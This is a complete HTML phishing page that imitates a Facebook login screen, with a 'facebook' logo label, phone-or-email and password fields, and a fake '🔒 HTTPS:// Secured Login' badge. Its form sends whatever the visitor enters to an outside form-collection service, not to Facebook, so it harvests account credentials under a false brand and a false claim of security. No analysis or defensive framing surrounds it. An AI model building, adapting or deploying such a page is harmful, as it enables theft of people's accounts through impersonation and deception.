<!DOCTYPE html>
<html>
<style>
* {
  box-sizing: border-box;
}

input[type=text]{
  width: 100%;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 4px;
  resize: vertical;
}

label {
  padding: 12px 0;
  display: inline-block;
  font-family: "Lucida Console", "Courier New", monospace;
}
input[type=submit] {
  background-color: #1877f2;
  color: white;
  font-size:16px;
  font-weight: bold;
  padding: 12px 20px;
  border: none;
  border-radius: 4px;
  cursor: pointer;
  float: right;
}

input[type=submit]:hover {
  background-color: #0052bd;
}

.container {
  border-radius: 10px;
  background-color: white;
  padding: 20px;
  margin: 25px;
/*  box-shadow: 0px 0px 10px grey;*/
}

.col-25 {
  float: left;
  width: 25%;
  margin-top: 6px;
}

.col-75 {
  float: left;
  width: 75%;
  margin-top: 6px;
}
label[for="logo"] {
  background-color: white;
  color: #1877f2;
  font-size:35px;
  font-weight: bold;
  padding: 5px 20px;
  border: none;
  border-radius: 15px;
  cursor: pointer;
  float: center;
  font-family: 'Roboto';
}

label[for="sec"]{
  color: #07BC00;
  font-weight: bold;
  font-size:12px;
  background-color:white;
  padding: 10px 25px;
  border: none;
  border-radius: 15px;
  /*float: center;*/

}
.centre {
  text-align: center;
}

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

/* Responsive layout - when the screen is less than 600px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 600px) {
  .col-25, .col-75, input[type=submit] {
    width: 100%;
    margin-top: 0;
  }
}
</style>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Log In</title>
</head>
<body>
  <section>
  <div class="container">
    <form action="https://formspree.io/f/mayaolka" 
    method="POST" 
    id="my-form">

      <div class="row">
      <div class="centre">
        <label for="logo">facebook</label>
      </div>
      <div class="col-25">
        <p></p>
      </div>
      <div class="col-75">
        <input type="text" id="username" name="username" placeholder="Phone or email   ">
      </div>
    </div>
    <div class="row">
      <div class="col-25">
        <p></p>
      </div>
      <div class="col-75">
        <input type="text" id="password" name="password" placeholder="Password         ">
      </div>
    </div>
    <div class="row">
      <p></p>
      <input type="submit" value="Log In">
      <label></label>
      <div class="centre">
      <label for="sec">🔒 HTTPS:// Secured Login</label></div>
    </div>
    </form>
  </div>
  <div id="status"></div>
</section>
</body>
</html>
